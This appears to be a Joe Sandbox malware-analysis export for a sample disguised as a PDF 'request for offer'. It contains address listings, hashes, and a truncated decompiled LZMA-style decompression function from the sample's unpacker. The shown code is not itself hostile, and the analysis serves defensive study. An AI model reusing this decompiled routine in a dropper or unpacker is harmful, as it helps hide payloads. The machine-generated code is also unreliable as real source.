0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00406fc2
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00000000
0x00406fc8
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00406f49
0x00406f46
0x00000000
0x00406b7d

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C97() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
